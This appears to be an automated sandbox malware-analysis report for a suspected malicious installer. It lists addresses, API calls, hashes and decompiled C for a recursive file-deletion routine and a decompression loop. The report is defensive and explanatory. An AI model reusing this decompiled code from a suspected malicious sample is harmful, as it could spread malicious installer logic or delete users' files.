                                                                        0x72491cbc
                                                                        0x72491cc3
                                                                        0x72491cc6
                                                                        0x72491cc9
                                                                        0x00000000
                                                                        0x72491cc9
                                                                        0x72491ca9
                                                                        0x72491c72
                                                                        0x72491c73
                                                                        0x72491c8e
                                                                        0x72491c91
                                                                        0x00000000
                                                                        0x72491c97
                                                                        0x72491c97
                                                                        0x72491c9e
                                                                        0x72491ca1
                                                                        0x00000000
                                                                        0x72491ca1
                                                                        0x72491c91
                                                                        0x72491c78
                                                                        0x00000000
                                                                        0x72491c7e
                                                                        0x72491c7e
                                                                        0x72491c85
                                                                        0x00000000
                                                                        0x72491c85
                                                                        0x72491c78
                                                                        0x72491e74
                                                                        0x72491e79
                                                                        0x72491e7e
                                                                        0x72491e82
                                                                        0x72492355
                                                                        0x7249235b
                                                                        0x72491e94
                                                                        0x72491e96
                                                                        0x72491e97
                                                                        0x7249227e
                                                                        0x7249227e
                                                                        0x72492281
                                                                        0x72492284
                                                                        0x724922a1
                                                                        0x724922a7
                                                                        0x724922a9
                                                                        0x724922af
                                                                        0x724922c6
                                                                        0x724922c6
                                                                        0x724922c6
                                                                        0x724922d3
                                                                        0x724922d9
                                                                        0x724922dc
                                                                        0x724922e2
                                                                        0x724922e4
                                                                        0x724922e8
                                                                        0x724922ea
                                                                        0x724922f1
                                                                        0x724922f6
                                                                        0x724922f9
                                                                        0x724922fb
                                                                        0x72492300
                                                                        0x72492312
                                                                        0x72492312
                                                                        0x72492300
                                                                        0x724922f9
                                                                        0x724922e8
                                                                        0x72492318
                                                                        0x7249231b
                                                                        0x72492325
                                                                        0x7249232d
                                                                        0x7249233a
                                                                        0x72492340
                                                                        0x72492343
                                                                        0x72492273
                                                                        0x72492273
                                                                        0x00000000
                                                                        0x72492273
                                                                        0x72492349
                                                                        0x7249234f
                                                                        0x7249234f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492351
                                                                        0x72492351
                                                                        0x72492351
                                                                        0x72492351
                                                                        0x00000000
                                                                        0x7249231d
                                                                        0x7249231d
                                                                        0x72492323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492323
                                                                        0x7249231b
                                                                        0x724922b2
                                                                        0x724922b8
                                                                        0x724922ba
                                                                        0x724922c0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724922c0
                                                                        0x72492286
                                                                        0x7249228d
                                                                        0x72492293
                                                                        0x72492299
                                                                        0x00000000
                                                                        0x72492299
                                                                        0x72491e9d
                                                                        0x72491e9e
                                                                        0x7249225d
                                                                        0x7249225d
                                                                        0x72492263
                                                                        0x72492266
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x7249226d
                                                                        0x72492272
                                                                        0x00000000
                                                                        0x72492272
                                                                        0x72491ea5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491eab
                                                                        0x72491eab
                                                                        0x72491eb4
                                                                        0x72491eb9
                                                                        0x72491ebf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491ec5
                                                                        0x72491ed2
                                                                        0x72491ed8
                                                                        0x72491ee2
                                                                        0x72491ee8
                                                                        0x72491ef0
                                                                        0x72491f00
                                                                        0x00000000
                                                                        0x72491f00

                                                                        APIs
                                                                          • Part of subcall function 724912BB: GlobalAlloc.KERNELBASE(00000040,?,724912DB,?,7249137F,00000019,724911CA,-000000A0), ref: 724912C5
                                                                        • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 72491D2D
                                                                        • lstrcpyW.KERNEL32 ref: 72491D75
                                                                        • lstrcpyW.KERNEL32 ref: 72491D7F
                                                                        • GlobalFree.KERNEL32 ref: 72491D92
                                                                        • GlobalFree.KERNEL32 ref: 72491E74
                                                                        • GlobalFree.KERNEL32 ref: 72491E79
                                                                        • GlobalFree.KERNEL32 ref: 72491E7E
                                                                        • GlobalFree.KERNEL32 ref: 72492068
                                                                        • lstrcpyW.KERNEL32 ref: 72492222
                                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 724922A1
                                                                        • LoadLibraryW.KERNEL32(00000008), ref: 724922B2
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7249230C
                                                                        • lstrlenW.KERNEL32(00000808), ref: 72492326
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                        • String ID: Nv@hv
                                                                        • API String ID: 245916457-4226514844
                                                                        • Opcode ID: 8df8c1ce51e7172f4f313ce20958c7716e129d957c876a06a55e4de5a5691144
                                                                        • Instruction ID: 71ae3a11adf472508c3aa68f717435cb785e6ccfba2b847aa6e75779999eb087
                                                                        • Opcode Fuzzy Hash: 8df8c1ce51e7172f4f313ce20958c7716e129d957c876a06a55e4de5a5691144
                                                                        • Instruction Fuzzy Hash: CC22687190420ADFCB12CFACC5847AEBFB5FB04319F11552ED1EBA6284D7B05A92CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 670 405d74-405d9a call 40603f 673 405db3-405dba 670->673 674 405d9c-405dae DeleteFileW 670->674 676 405dbc-405dbe 673->676 677 405dcd-405ddd call 406668 673->677 675 405f30-405f34 674->675 678 405dc4-405dc7 676->678 679 405ede-405ee3 676->679 685 405dec-405ded call 405f83 677->685 686 405ddf-405dea lstrcatW 677->686 678->677 678->679 679->675 682 405ee5-405ee8 679->682 683 405ef2-405efa call 40699e 682->683 684 405eea-405ef0 682->684 683->675 694 405efc-405f10 call 405f37 call 405d2c 683->694 684->675 688 405df2-405df6 685->688 686->688 690 405e02-405e08 lstrcatW 688->690 691 405df8-405e00 688->691 693 405e0d-405e29 lstrlenW FindFirstFileW 690->693 691->690 691->693 695 405ed3-405ed7 693->695 696 405e2f-405e37 693->696 710 405f12-405f15 694->710 711 405f28-405f2b call 4056ca 694->711 695->679 701 405ed9 695->701 698 405e57-405e6b call 406668 696->698 699 405e39-405e41 696->699 712 405e82-405e8d call 405d2c 698->712 713 405e6d-405e75 698->713 702 405e43-405e4b 699->702 703 405eb6-405ec6 FindNextFileW 699->703 701->679 702->698 706 405e4d-405e55 702->706 703->696 709 405ecc-405ecd FindClose 703->709 706->698 706->703 709->695 710->684 715 405f17-405f26 call 4056ca call 406428 710->715 711->675 721 405eae-405eb1 call 4056ca 712->721 722 405e8f-405e92 712->722 713->703 716 405e77-405e80 call 405d74 713->716 715->675 716->703 721->703 725 405e94-405ea4 call 4056ca call 406428 722->725 726 405ea6-405eac 722->726 725->703 726->703
                                                                        C-Code - Quality: 98%
                                                                        			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				short _v556;
                                                                        				short _v558;
                                                                        				struct _WIN32_FIND_DATAW _v604;
                                                                        				signed int _t38;
                                                                        				signed int _t52;
                                                                        				signed int _t55;
                                                                        				signed int _t62;
                                                                        				void* _t64;
                                                                        				signed char _t65;
                                                                        				WCHAR* _t66;
                                                                        				void* _t67;
                                                                        				WCHAR* _t68;
                                                                        				void* _t70;
                                                                        
                                                                        				_t65 = _a8;
                                                                        				_t68 = _a4;
                                                                        				_v8 = _t65 & 0x00000004;
                                                                        				_t38 = E0040603F(__eflags, _t68);
                                                                        				_v12 = _t38;
                                                                        				if((_t65 & 0x00000008) != 0) {
                                                                        					_t62 = DeleteFileW(_t68); // executed
                                                                        					asm("sbb eax, eax");
                                                                        					_t64 =  ~_t62 + 1;
                                                                        					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                        					return _t64;
                                                                        				}
                                                                        				_a4 = _t65;
                                                                        				_t8 =  &_a4;
                                                                        				 *_t8 = _a4 & 0x00000001;
                                                                        				__eflags =  *_t8;
                                                                        				if( *_t8 == 0) {
                                                                        					L5:
                                                                        					E00406668(0x425750, _t68);
                                                                        					__eflags = _a4;
                                                                        					if(_a4 == 0) {
                                                                        						E00405F83(_t68);
                                                                        					} else {
                                                                        						lstrcatW(0x425750, L"\\*.*");
                                                                        					}
                                                                        					__eflags =  *_t68;
                                                                        					if( *_t68 != 0) {
                                                                        						L10:
                                                                        						lstrcatW(_t68, 0x40a014);
                                                                        						L11:
                                                                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                        						_t38 = FindFirstFileW(0x425750,  &_v604);
                                                                        						_t70 = _t38;
                                                                        						__eflags = _t70 - 0xffffffff;
                                                                        						if(_t70 == 0xffffffff) {
                                                                        							L26:
                                                                        							__eflags = _a4;
                                                                        							if(_a4 != 0) {
                                                                        								_t30 = _t66 - 2;
                                                                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                        								__eflags =  *_t30;
                                                                        							}
                                                                        							goto L28;
                                                                        						} else {
                                                                        							goto L12;
                                                                        						}
                                                                        						do {
                                                                        							L12:
                                                                        							__eflags = _v604.cFileName - 0x2e;
                                                                        							if(_v604.cFileName != 0x2e) {
                                                                        								L16:
                                                                        								E00406668(_t66,  &(_v604.cFileName));
                                                                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                        								if(__eflags == 0) {
                                                                        									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                        									__eflags = _t52;
                                                                        									if(_t52 != 0) {
                                                                        										E004056CA(0xfffffff2, _t68);
                                                                        									} else {
                                                                        										__eflags = _v8 - _t52;
                                                                        										if(_v8 == _t52) {
                                                                        											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                        										} else {
                                                                        											E004056CA(0xfffffff1, _t68);
                                                                        											E00406428(_t67, _t68, 0);
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                                        									if(__eflags == 0) {
                                                                        										E00405D74(__eflags, _t68, _a8);
                                                                        									}
                                                                        								}
                                                                        								goto L24;
                                                                        							}
                                                                        							__eflags = _v558;
                                                                        							if(_v558 == 0) {
                                                                        								goto L24;
                                                                        							}
                                                                        							__eflags = _v558 - 0x2e;
                                                                        							if(_v558 != 0x2e) {
                                                                        								goto L16;
                                                                        							}
                                                                        							__eflags = _v556;
                                                                        							if(_v556 == 0) {
                                                                        								goto L24;
                                                                        							}
                                                                        							goto L16;
                                                                        							L24:
                                                                        							_t55 = FindNextFileW(_t70,  &_v604);
                                                                        							__eflags = _t55;
                                                                        						} while (_t55 != 0);
                                                                        						_t38 = FindClose(_t70);
                                                                        						goto L26;
                                                                        					}
                                                                        					__eflags =  *0x425750 - 0x5c;
                                                                        					if( *0x425750 != 0x5c) {
                                                                        						goto L11;
                                                                        					}
                                                                        					goto L10;
                                                                        				} else {
                                                                        					__eflags = _t38;
                                                                        					if(_t38 == 0) {
                                                                        						L28:
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L36:
                                                                        							return _t38;
                                                                        						}
                                                                        						__eflags = _v12;
                                                                        						if(_v12 != 0) {
                                                                        							_t38 = E0040699E(_t68);
                                                                        							__eflags = _t38;
                                                                        							if(_t38 == 0) {
                                                                        								goto L36;
                                                                        							}
                                                                        							E00405F37(_t68);
                                                                        							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                        							__eflags = _t38;
                                                                        							if(_t38 != 0) {
                                                                        								return E004056CA(0xffffffe5, _t68);
                                                                        							}
                                                                        							__eflags = _v8;
                                                                        							if(_v8 == 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							E004056CA(0xfffffff1, _t68);
                                                                        							return E00406428(_t67, _t68, 0);
                                                                        						}
                                                                        						L30:
                                                                        						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                        						return _t38;
                                                                        					}
                                                                        					__eflags = _t65 & 0x00000002;
                                                                        					if((_t65 & 0x00000002) == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        			}


















                                                                        0x00405d7e
                                                                        0x00405d83
                                                                        0x00405d8c
                                                                        0x00405d8f
                                                                        0x00405d97
                                                                        0x00405d9a
                                                                        0x00405d9d
                                                                        0x00405da5
                                                                        0x00405da7
                                                                        0x00405da8
                                                                        0x00000000
                                                                        0x00405da8
                                                                        0x00405db3
                                                                        0x00405db6
                                                                        0x00405db6
                                                                        0x00405db6
                                                                        0x00405dba
                                                                        0x00405dcd
                                                                        0x00405dd4
                                                                        0x00405dd9
                                                                        0x00405ddd
                                                                        0x00405ded
                                                                        0x00405ddf
                                                                        0x00405de5
                                                                        0x00405de5
                                                                        0x00405df2
                                                                        0x00405df6
                                                                        0x00405e02
                                                                        0x00405e08
                                                                        0x00405e0d
                                                                        0x00405e13
                                                                        0x00405e1e
                                                                        0x00405e24
                                                                        0x00405e26
                                                                        0x00405e29
                                                                        0x00405ed3
                                                                        0x00405ed3
                                                                        0x00405ed7
                                                                        0x00405ed9
                                                                        0x00405ed9
                                                                        0x00405ed9
                                                                        0x00405ed9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405e2f
                                                                        0x00405e2f
                                                                        0x00405e2f
                                                                        0x00405e37
                                                                        0x00405e57
                                                                        0x00405e5f
                                                                        0x00405e64
                                                                        0x00405e6b
                                                                        0x00405e86
                                                                        0x00405e8b
                                                                        0x00405e8d
                                                                        0x00405eb1
                                                                        0x00405e8f
                                                                        0x00405e8f
                                                                        0x00405e92
                                                                        0x00405ea6
                                                                        0x00405e94
                                                                        0x00405e97
                                                                        0x00405e9f
                                                                        0x00405e9f
                                                                        0x00405e92
                                                                        0x00405e6d
                                                                        0x00405e73
                                                                        0x00405e75
                                                                        0x00405e7b
                                                                        0x00405e7b
                                                                        0x00405e75
                                                                        0x00000000
                                                                        0x00405e6b
                                                                        0x00405e39
                                                                        0x00405e41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405e43
                                                                        0x00405e4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405e4d
                                                                        0x00405e55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405eb6
                                                                        0x00405ebe
                                                                        0x00405ec4
                                                                        0x00405ec4
                                                                        0x00405ecd
                                                                        0x00000000
                                                                        0x00405ecd
                                                                        0x00405df8
                                                                        0x00405e00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405dbc
                                                                        0x00405dbc
                                                                        0x00405dbe
                                                                        0x00405ede
                                                                        0x00405ee0
                                                                        0x00405ee3
                                                                        0x00405f34
                                                                        0x00405f34
                                                                        0x00405f34
                                                                        0x00405ee5
                                                                        0x00405ee8
                                                                        0x00405ef3
                                                                        0x00405ef8
                                                                        0x00405efa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405efd
                                                                        0x00405f09
                                                                        0x00405f0e
                                                                        0x00405f10
                                                                        0x00000000
                                                                        0x00405f2b
                                                                        0x00405f12
                                                                        0x00405f15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405f1a
                                                                        0x00000000
                                                                        0x00405f21
                                                                        0x00405eea
                                                                        0x00405eea
                                                                        0x00000000
                                                                        0x00405eea
                                                                        0x00405dc4
                                                                        0x00405dc7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405dc7

                                                                        APIs
                                                                        • DeleteFileW.KERNELBASE(?,?,76F1FAA0,76F1F560,00000000), ref: 00405D9D
                                                                        • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76F1FAA0,76F1F560,00000000), ref: 00405E0E
                                                                        • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,76F1FAA0,76F1F560,00000000), ref: 00405E1E
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                        • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: .$.$PWB$\*.*
                                                                        • API String ID: 2035342205-2468439962
                                                                        • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                        • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                        • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                        • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E00406D5F() {
                                                                        				unsigned short _t531;
                                                                        				signed int _t532;
                                                                        				void _t533;
                                                                        				void* _t534;
                                                                        				signed int _t535;
                                                                        				signed int _t565;
                                                                        				signed int _t568;
                                                                        				signed int _t590;
                                                                        				signed int* _t607;
                                                                        				void* _t614;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					if( *(_t614 - 0x40) != 0) {
                                                                        						 *(_t614 - 0x34) = 1;
                                                                        						 *(_t614 - 0x84) = 7;
                                                                        						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                        						L132:
                                                                        						 *(_t614 - 0x54) = _t607;
                                                                        						L133:
                                                                        						_t531 =  *_t607;
                                                                        						_t590 = _t531 & 0x0000ffff;
                                                                        						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                        						if( *(_t614 - 0xc) >= _t565) {
                                                                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                        							 *(_t614 - 0x40) = 1;
                                                                        							_t532 = _t531 - (_t531 >> 5);
                                                                        							 *_t607 = _t532;
                                                                        						} else {
                                                                        							 *(_t614 - 0x10) = _t565;
                                                                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                        							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                        						}
                                                                        						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                        							L139:
                                                                        							_t533 =  *(_t614 - 0x84);
                                                                        							L140:
                                                                        							 *(_t614 - 0x88) = _t533;
                                                                        							goto L1;
                                                                        						} else {
                                                                        							L137:
                                                                        							if( *(_t614 - 0x6c) == 0) {
                                                                        								 *(_t614 - 0x88) = 5;
                                                                        								goto L170;
                                                                        							}
                                                                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                        							goto L139;
                                                                        						}
                                                                        					} else {
                                                                        						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        						__esi =  *(__ebp - 0x60);
                                                                        						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        						__ecx =  *(__ebp - 0x3c);
                                                                        						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        						__ecx =  *(__ebp - 4);
                                                                        						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        						if( *(__ebp - 0x38) >= 4) {
                                                                        							if( *(__ebp - 0x38) >= 0xa) {
                                                                        								_t97 = __ebp - 0x38;
                                                                        								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                        							} else {
                                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        							}
                                                                        						} else {
                                                                        							 *(__ebp - 0x38) = 0;
                                                                        						}
                                                                        						if( *(__ebp - 0x34) == __edx) {
                                                                        							__ebx = 0;
                                                                        							__ebx = 1;
                                                                        							L60:
                                                                        							__eax =  *(__ebp - 0x58);
                                                                        							__edx = __ebx + __ebx;
                                                                        							__ecx =  *(__ebp - 0x10);
                                                                        							__esi = __edx + __eax;
                                                                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        							__ax =  *__esi;
                                                                        							 *(__ebp - 0x54) = __esi;
                                                                        							__edi = __ax & 0x0000ffff;
                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        								__cx = __ax;
                                                                        								_t216 = __edx + 1; // 0x1
                                                                        								__ebx = _t216;
                                                                        								__cx = __ax >> 5;
                                                                        								 *__esi = __ax;
                                                                        							} else {
                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                        								0x800 = 0x800 - __edi;
                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        								L59:
                                                                        								if(__ebx >= 0x100) {
                                                                        									goto L54;
                                                                        								}
                                                                        								goto L60;
                                                                        							} else {
                                                                        								L57:
                                                                        								if( *(__ebp - 0x6c) == 0) {
                                                                        									 *(__ebp - 0x88) = 0xf;
                                                                        									goto L170;
                                                                        								}
                                                                        								__ecx =  *(__ebp - 0x70);
                                                                        								__eax =  *(__ebp - 0xc);
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        								_t202 = __ebp - 0x70;
                                                                        								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        								goto L59;
                                                                        							}
                                                                        						} else {
                                                                        							__eax =  *(__ebp - 0x14);
                                                                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        							if(__eax >=  *(__ebp - 0x74)) {
                                                                        								__eax = __eax +  *(__ebp - 0x74);
                                                                        							}
                                                                        							__ecx =  *(__ebp - 8);
                                                                        							__ebx = 0;
                                                                        							__ebx = 1;
                                                                        							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        							L40:
                                                                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        							__ecx =  *(__ebp - 0x58);
                                                                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        							 *(__ebp - 0x48) = __eax;
                                                                        							__eax = __eax + 1;
                                                                        							__eax = __eax << 8;
                                                                        							__eax = __eax + __ebx;
                                                                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        							__ax =  *__esi;
                                                                        							 *(__ebp - 0x54) = __esi;
                                                                        							__edx = __ax & 0x0000ffff;
                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        								__cx = __ax;
                                                                        								 *(__ebp - 0x40) = 1;
                                                                        								__cx = __ax >> 5;
                                                                        								__ebx = __ebx + __ebx + 1;
                                                                        								 *__esi = __ax;
                                                                        							} else {
                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                        								0x800 = 0x800 - __edx;
                                                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        								L38:
                                                                        								__eax =  *(__ebp - 0x40);
                                                                        								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        									while(1) {
                                                                        										if(__ebx >= 0x100) {
                                                                        											break;
                                                                        										}
                                                                        										__eax =  *(__ebp - 0x58);
                                                                        										__edx = __ebx + __ebx;
                                                                        										__ecx =  *(__ebp - 0x10);
                                                                        										__esi = __edx + __eax;
                                                                        										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        										__ax =  *__esi;
                                                                        										 *(__ebp - 0x54) = __esi;
                                                                        										__edi = __ax & 0x0000ffff;
                                                                        										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        										if( *(__ebp - 0xc) >= __ecx) {
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        											__cx = __ax;
                                                                        											_t169 = __edx + 1; // 0x1
                                                                        											__ebx = _t169;
                                                                        											__cx = __ax >> 5;
                                                                        											 *__esi = __ax;
                                                                        										} else {
                                                                        											 *(__ebp - 0x10) = __ecx;
                                                                        											0x800 = 0x800 - __edi;
                                                                        											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        											__ebx = __ebx + __ebx;
                                                                        											 *__esi = __cx;
                                                                        										}
                                                                        										 *(__ebp - 0x44) = __ebx;
                                                                        										if( *(__ebp - 0x10) < 0x1000000) {
                                                                        											L45:
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
